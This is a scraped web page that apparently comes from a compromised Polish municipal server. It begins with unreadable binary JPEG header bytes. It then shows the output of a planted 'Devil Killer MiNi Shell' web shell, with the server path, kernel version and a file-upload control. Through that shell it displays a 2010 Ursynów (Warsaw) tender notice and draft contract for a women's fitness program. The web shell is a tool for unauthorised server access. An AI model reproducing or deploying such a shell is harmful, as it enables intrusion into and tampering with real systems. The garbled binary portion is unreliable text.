JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100309/64264-N-2010.html

<p class="kh_header"><b>Warszawa: Zorganizowanie i przeprowadzenie programu rekreacyjno - ruchowych zajęć z elementami aerobicu, fitness i gimnastyki przeznaczonego dla kobiet w średnim wieku pn. Trzymaj Formę</b><br>
<b>Numer ogłoszenia: 64264 - 2010; data zamieszczenia: 09.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Ursynów , al. Komisji Edukacji Narodowej 61, 02-777 Warszawa, woj. mazowieckie, tel. 022 5457100, faks 022 5457291.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ursynow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie programu rekreacyjno - ruchowych zajęć z elementami aerobicu, fitness i gimnastyki przeznaczonego dla kobiet w średnim wieku pn. Trzymaj Formę.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZORGANIZOWANIA I PRZEPROWADZENIA PROGRAMU REKREACYJNO-RUCHOWYCH ZAJĘĆ Z ELEMENTAMI AEROBICU, FITNESS I GIMNASTYKI PRZEZNACZONEGO DLA KOBIET W ŚREDNIM WIEKU.

Zajęcia rekreacyjno ruchowe pn Trzymaj Formę w okresie od 29.03.2010 r. do 25.06.2010 r. oraz od 1.09.2010 r, do 17.12.2010 r.
Trzymaj Formę jest to program rekreacyjno-zdrowotnych zajęć ruchowych, którego założenia zostały opracowane przez Wydział Sportu i Rekreacji Dzielnicy Ursynów. Pierwsza, pilotażowa edycja została zrealizowana w 2008 r. w 4 placówkach oświatowych mieszczących się na terenie Ursynowa - usytuowanych tak, aby umożliwić do nich dobry dostęp zainteresowanym osobom. Są to: Szkoła Podstawowa nr 81, ul. Puszczyka 6, Szkoła Podstawowa nr 343, ul. Kopcińskiego 7, Szkoła Podstawowa nr 323, ul. Warchałowskiego 4 oraz Szkoła Podstawowa nr 96, ul. Sarabandy 16/22. W kolejnej, trzeciej już edycji 2010 ze względu na duże zainteresowanie do programu przystępuje nowa placówka - Gimnazjum nr 92 przy ul. Koncertowej 4. Program ma być kontynuowany w szkołach w terminie od 29.03.2010 r. do 25.06.2010 r. oraz od 1.09.2010 r. do 17.12.2010 r. W sumie zaplanowano do przeprowadzenia 642 godziny zajęć dla 11 grup uczestniczek. 
 
Program Trzymaj Formę jest kierowany do kobiet w przedziale wiekowym około 40 - 65 lat, które w miarę możliwości są dzielone na grupy pod względem wieku, stanu zdrowia i kondycji fizycznej. Program jest nieodpłatny dla uczestników. 
Podmiot organizujący ww. zajęcia zobowiązany będzie do:

a.	Zapewnienia wykwalifikowanych instruktorów fitness do prowadzenia zajęć.
b.	Opracowania i przygotowania programu zajęć rekreacyjno-ruchowych 
z elementami aerobicu, fitness i gimnastyki odpowiedniego dla kobiet w wieku od 40-65 lat.
c.	Przeprowadzenia zapisów uczestniczek zajęć (dotyczy całego okresu trwania programu w 2010 r.), z uwzględnieniem przy ich kwalifikowaniu do poszczególnych grup, wieku, stanu zdrowia i kondycji fizycznej.
d.	Udostępnienia uczestnikom w celu przeprowadzenia zapisów min. trzech linii telefonicznych przez co najmniej dwa dni, a podczas trwania programu jednej, która będzie miała charakter informacyjno-kontaktowy.
e.	Przeprowadzenia 642 godzin zajęć realizowanych na terenie pięciu wskazanych przez zamawiającego placówkach szkolnych, znajdujących się na terenie Dzielnicy Ursynów m.st. Warszawy: Szkoła Podstawowa 81 ul. Puszczyka 6, Szkoła Podstawowa 96 ul. Sarabandy 16/22, Szkoła Podstawowa nr 323, ul. Warchałowskiego 4, Szkoła Podstawowa nr 343, ul Kopcińskiego 7  oraz Gimnazjum nr 92, ul. Koncertowa 4 dla 11  grup ćwiczących uczestników.
f.	Prowadzenia nadzoru nad zajęciami, przekazywania uczestnikom informacji o ewentualnych zmianach w harmonogramie zajęć.
g.	Prowadzenia list obecności i egzekwowaniu zapisów regulaminu programu.
h.	Nadzoru nad powierzonym sprzętem do ćwiczeń wykorzystywanym w trakcie zajęć..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.62.00.00-3.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga w przedmiotowym postępowaniu wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje osobami zdolnymi do wykonywania zamówienia, legitymującymi się odpowiednimi kwalifikacjami zawodowymi tj. co najmniej: czteroma instruktorami posiadającymi uprawnienia instruktora rekreacji ruchowej ze specjalnością fitness lub aerobicu.
Ocena spełniania warunku udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w dokumentach, o których mowa w pkt III.4) Z treści załączonego dokumentu musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji  niezbędnych zasobów na okres korzystania z nich przy przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://aukcje.um.warszawa.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.ursynow.waw.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> Wykonawca, pobiera ze wskazanej w ogłoszeniu o przedmiotowej licytacji strony internetowej wzór wniosku wraz z załącznikami. Następnie, w przypadku zainteresowania udziałem w licytacji elektronicznej, składa wniosek o dopuszczenie do udziału w postępowaniu. Złożenie wniosku jednocześnie oznacza akceptację warunków licytacji i postanowień umowy. Zamawiający, po weryfikacji nadesłanych wniosków, informuje Wykonawców o wyniku kwalifikacji oraz zaprasza do składania ofert (postąpień) wszystkich Wykonawców spełniających warunki udziału w postępowaniu. Treść zaproszenia zawierać będzie adres strony internetowej, na której odbywać się będzie licytacja oraz parametry licytacji elektronicznej (data, godzina otwarcia, czas trwania i warunki zamknięcia licytacji). Następnie za pośrednictwem operatora platformy do zakwalifikowanych do udziału w licytacji Wykonawców przekazywana jest informacja o sposobie rejestracji na platformie licytacyjnej. Informacja ta przekazywana jest na wskazane we wnioskach Wykonawców adresy e-mail. Po otrzymaniu informacji Wykonawca rejestruje się na platformie aukcyjnej pod adresem http://aukcje.um.warszawa.pl postępując zgodnie z przekazaną procedurą rejestracji. Otrzymany kod dostępu Wykonawca będzie mógł zmienić na nowy - określony przez siebie.
Komputer użytkownika powinien spełniać następujące wymagania: 
być wyposażony w procesor 733 MHz lub wyższy i posiadać co najmniej 512  pamięci RAM, posiadać zainstalowany system operacyjny MS Windows XP lub wyższy, posiadać zainstalowaną przeglądarkę internetową Microsoft Internet Explorer 6.0. albo Mozilla, posiadać połączenie z siecią Internet o szybkości transmisji nie mniejszej niż 128 kb/s..</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1.	W trakcie licytacji Wykonawca podaje cenę brutto (z VAT) za wykonanie całego zamówienia. W toku licytacji elektronicznej Zamawiający na bieżąco przekazuje wszystkim wykonawcom informacje o pozycji składanych przez nich ofert, liczbie wykonawców biorących udział w licytacji, także o cenach złożonych przez nich ofert, z tym, że do momentu zamknięcia licytacji elektronicznej nie ujawnia informacji umożliwiających identyfikację Wykonawców. 
2.	Zaproponowana przez Wykonawcę cena będzie stała w czasie objętym umową. Zapłata nastąpi zgodnie z warunkami umowy - wzór umowy zamieszczony został w pkt  IV. 4. 15) Ogłoszenia.
3.	Zamawiający dopuszcza prowadzenie rozliczeń z Wykonawcą jedynie w walucie polskiej. Dodatkowo nadmienia się, iż postąpienia w trakcie licytacji elektronicznej muszą być składane również w walucie polskiej. 
4.	Za ofertę najkorzystniejszą zostanie uznana oferta, która zawierać będzie w chwili zamknięcia licytacji elektronicznej, najniższą cenę brutto realizacji całego zamówienia.
5.	Po zamknięciu licytacji elektronicznej w terminie wyznaczonym przez Zamawiającego, Wykonawca, który został zwycięzcą licytacji elektronicznej ma obowiązek przekazać Zamawiającemu formularz cenowy zgodny z treścią załącznika nr 2 wzoru umowy, z tym, że łączna cena zamówienia brutto wynikająca z przedmiotu zamówienia musi być co najwyżej równa z ceną realizacji oferty, która wygrała licytację elektroniczną. W powyżej przywołanym formularzu cenowym Wykonawca na podstawie harmonogramu, który stanowi załącznik nr 1 do umowy określi cenę realizacji programu odpowiednio w okresach od 29.03.2010 r. do 30.04.2010 r., od 01.05.2010 r. do 25.06.2010 r., od 01.09.2010 r. do 31.10.2010r., od 01.11.2010 do 17.12.2010 r. oraz łączną cenę za wykonanie przedmiotu zamówienia. Powyższy dokument stanowić będzie podstawę do rozliczeń tj. określenia wysokości 4 rat płatności. Wszystkie ceny muszą być ustalone z dokładnością do dwóch miejsc po przecinku. 
6.	Minimalna wysokość postąpień  - 500,00 zł.
7.	Cena wywoławcza: 101 821,20 zł..</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 20 minut</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 17.03.2010 godzina 10:00, miejsce: SIEDZIBA ZAMAWIAJACEGO PRZY AL. KEN 61, WYDZIAŁ SPORTU I REKREACJI, POK. NR 551.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> Zamawiający przewiduje otwarcie licytacji elektronicznej w dniu 25/03/2010 r. o godz. 11:00. Ostateczny termin licytacji zamawiający poda w zaproszeniu do udziału w licytacji elektronicznej..</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>25/03/2010godz.11:20.Licytację zamyka się gdy w podst czasie nie zostanie złożona żadna oferta lub gdy w ciągu 5 min od złożenia oferty przez jednego z Wyk. nie zostanie złożona inna oferta,jednak nie wcześniej niż po upływie 20min od otwarcia licyta</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Zamawiający nie wymaga od Wykonawcy zabezpieczenia należytego wykonania umowy.</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>WZÓR UMOWY
zawarta w dniu   2010 r. pomiędzy Miastem Stołecznym Warszawa Dzielnicą Ursynów, z siedzibą w Warszawie przy al. Komisji Edukacji Narodowej 61, NIP 525-22-48-481, REGON 015259640-00138, reprezentowanym na podstawie pełnomocnictwa Prezydenta m.st. Warszawy z dnia    r., Nr GP-    przez 
 - Burmistrza Dzielnicy Ursynów  m. st. Warszawy, zwanym w dalszej części umowy Zamawiającym,
a 
  PESEL  zam. w    przy ul.  NIP    REGON , zwanym  dalej Wykonawcą, wyłonionym w wyniku przeprowadzonego postępowania w trybie licytacji elektronicznej na podstawie art. 74  ustawy  z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst jednolity DZ. U. z 2007 r. Nr 223 poz. 1655 z późn. zm.)
§ 1
Zamawiający zleca, a Wykonawca zobowiązuje się do wykonania usługi obejmującej: zorganizowanie i przeprowadzenie programu rekreacyjno-ruchowych zajęć z elementami aerobicu, fitness i gimnastyki przeznaczonego dla kobiet w średnim wieku pn. Trzymaj Formę, zwanego dalej PROGRAMEM, w zakresie:
1.	Zapewnienia wykwalifikowanych instruktorów fitness do prowadzenia zajęć.
2.	Opracowania i przygotowania programu zajęć rekreacyjno-ruchowych 
z elementami aerobicu, fitness i gimnastyki odpowiedniego dla kobiet w wieku od 40-65 lat.
3.	Przeprowadzenia zapisów uczestniczek zajęć (dotyczy całego okresu trwania programu w 2010 r.), z uwzględnieniem przy ich kwalifikowaniu do poszczególnych grup, wieku, stanu zdrowia i kondycji fizycznej.
4.	Udostępnienia uczestnikom w celu przeprowadzenia zapisów min. trzech linii telefonicznych przez co najmniej dwa dni, a podczas trwania programu jednej, która będzie miała charakter informacyjno-kontaktowy.
5.	Przeprowadzenia 642 godzin zajęć realizowanych na terenie pięciu wskazanych przez zamawiającego placówkach szkolnych, znajdujących się na terenie Dzielnicy Ursynów m.st. Warszawy: Szkoła Podstawowa 81 ul. Puszczyka 6, Szkoła Podstawowa 96 ul. Sarabandy 16/22, Szkoła Podstawowa nr 323, ul. Warchałowskiego 4, Szkoła Podstawowa nr 343, ul Kopcińskiego 7  oraz Gimnazjum nr 92, ul. Koncertowa 4 dla 11  grup ćwiczących uczestników.
6.	Prowadzenia nadzoru nad zajęciami, przekazywania uczestnikom informacji o ewentualnych zmianach w harmonogramie zajęć.
7.	Prowadzenia list obecności i egzekwowaniu zapisów regulaminu programu.
8.	Nadzoru nad powierzonym sprzętem do ćwiczeń wykorzystywanym w trakcie zajęć.
§ 2
1.	Termin wykonania usługi ustala się na okres od 29.03.2010 r. do 25.06.2010 r. oraz od 1.09.2010 r. do 17.12.2010 r. wg harmonogramu przekazanego przez Zamawiającego i stanowiącego Załącznik nr 1 do umowy.
2.	Wykonawca przyjmuje odpowiedzialność za należytą organizację ujętego w  § 1 PROGRAMU.
§ 3
1.  Warunkiem koniecznym przystąpienia Wykonawcy do realizacji programu, o którym mowa w § 1 i § 2 niniejszej umowy, jest dołożenie przez Wykonawcę należytej staranności w zakresie zapewnienia bezpieczeństwa uczestniczących w przedsięwzięciu osób.
2.    Wykonawca zobowiązuje się do zapewnienia do prowadzenia PROGRAMU osób posiadających uprawnienia instruktorskie dotyczące tego typu zajęć oraz posiadających ubezpieczenie od odpowiedzialności cywilnej związane z ich prowadzeniem.
§ 4
1.	Za realizację PROGRAMU, określonego w § 1 i 2, Strony ustalają całkowite ryczałtowe wynagrodzenie brutto:     złotych  (słownie: ) -  zł netto +  VAT ( zł).
2.	Wynagrodzenie, o którym mowa w ust. 1 płatne będzie w czterech ratach, po wykonaniu pracy w danym okresie czasu: za realizację programu w terminie od 29.03.2010 r. do 30.04.2010 r.:  złotych brutto (słownie:  ) -  zł netto +  VAT (  zł), za realizację PROGRAMU w terminie od 1.05.2010 r. do 25.06.2010 r. :  złotych brutto (słownie:  ) -  zł netto +  VAT (  zł), za realizację PROGRAMU w terminie od 1.09.2010 r. do 31.10.2010 r. : złote brutto (słownie:  ) -  zł netto + VAT (  zł)  oraz za realizację PROGRAMU w terminie od 1.11.2010 r. do 17.12.2010 r. : złote brutto (słownie:  ) -  zł netto +  VAT ( zł) .
3.	W wynagrodzeniu określonym w ust. 1 mieszczą się wszelkie koszty realizacji PROGRAMU pn. Trzymaj Formę.
4.	Za termin zapłaty faktury uznaje się dzień, w którym Zamawiający polecił swojemu bankowi przelać na wskazany w fakturze rachunek bankowy określoną kwotę.
5.	Za nieterminowe realizowanie faktury, Wykonawcy przysługują odsetki ustawowe. 
6.	  Wykonawca wystawi faktury na Miasto Stołeczne Warszawa, Plac Bankowy 3/5 00-950 Warszawa, NIP 525-22-48-481 przy czym jako płatnika należy w fakturze wskazać Urząd Dzielnicy Ursynów m. st. Warszawy, al. KEN 61, 02-777 Warszawa. Fakturę należy złożyć w Wydziale Obsługi Mieszkańców Dzielnicy Ursynów przy al. KEN 61 w Warszawie.
7.	Należności Wykonawcy z tytułu realizacji  umowy płatne będą przelewem na rachunek bankowy  Wykonawcy wskazany na fakturze w ciągu 21 dni od dostarczenia prawidłowo wystawionej faktury VAT do siedziby Zamawiającego. 
§ 5
1.	Wykonawca zobowiązuje się do przygotowania informacji dotyczących realizacji zadania (stosownie do jego charakteru) i przekazania ich do Wydziału Sportu i Rekreacji Dzielnicy Ursynów m. st. Warszawy (w formie elektronicznej). Informacje te mają mieć charakter podsumowujący jego przebieg (najpóźniej do 48 godzin po zakończeniu PROGRAMU). 
§ 6
1.	Zamawiający zastrzega sobie prawo do naliczenia kary umownej w przypadku nie dojścia  do skutku  w całości bądź  w części PROGRAMU wymienionego w  § 1 - z przyczyn leżących po stronie Wykonawcy, Wykonawca zapłaci na rzecz Zamawiającego karę umowną w wysokości 20% wynagrodzenia całkowitego brutto określonego w § 4 ust. 1 
2.	W razie, gdy kary umowne nie pokryją poniesionej szkody, Zamawiający zachowuje możliwość dochodzenia odszkodowania uzupełniającego na zasadach przewidzianych w Kodeksie cywilnym.
3.	W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
4.	W przypadku, o którym mowa w ust. 3, wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy za usługę faktycznie wykonaną.  
5.	Zamawiający zastrzega sobie prawo potrącenia kary umownej z wynagrodzenia należnego Wykonawcy,bez wcześniejszego wezwania Wykonawcy do zapłaty tej kary.
§ 7
Strony Umowy ustalają, że w przypadku nienależytego przygotowania lub nienależytej realizacji PROGRAMU przez Wykonawcę - ponosi on całkowitą odpowiedzialność wobec osób trzecich, które z tego tytułu zgłoszą roszczenia.
§ 8
W sprawach nie objętych niniejszą Umową będą miały zastosowanie odpowiednie przepisy ustawy Prawo zamówień publicznych oraz Kodeksu Cywilnego.
§ 9
Wykonawca zobowiązuje się do zapewnienia bezpieczeństwa i ochrony danych osobowych pozyskanych w związku z realizacją niniejszej umowy, jak również do zapewnienia Zamawiającemu możliwości sprawowania nadzoru i kontroli nad przetwarzaniem i ochroną w/w danych osobowych.
§ 10
1.	Osobą bezpośrednio odpowiedzialną za realizację PROGRAMU w miejscu jego wykonania jest ze strony Wykonawcy 
2.	Osobami bezpośrednio prowadzącymi, ze strony Zamawiającego, sprawy dot. zawarcia i rozliczenia niniejszej Umowy, a także odpowiedzialnymi za bezpośredni nadzór nad realizacją przez Wykonawcę warunków niniejszej umowy w miejscu realizacji PROGRAMU , są pracownicy Urzędu Dzielnicy Ursynów m.st. Warszawy - Wydziału Sportu i Rekreacji.
§ 11
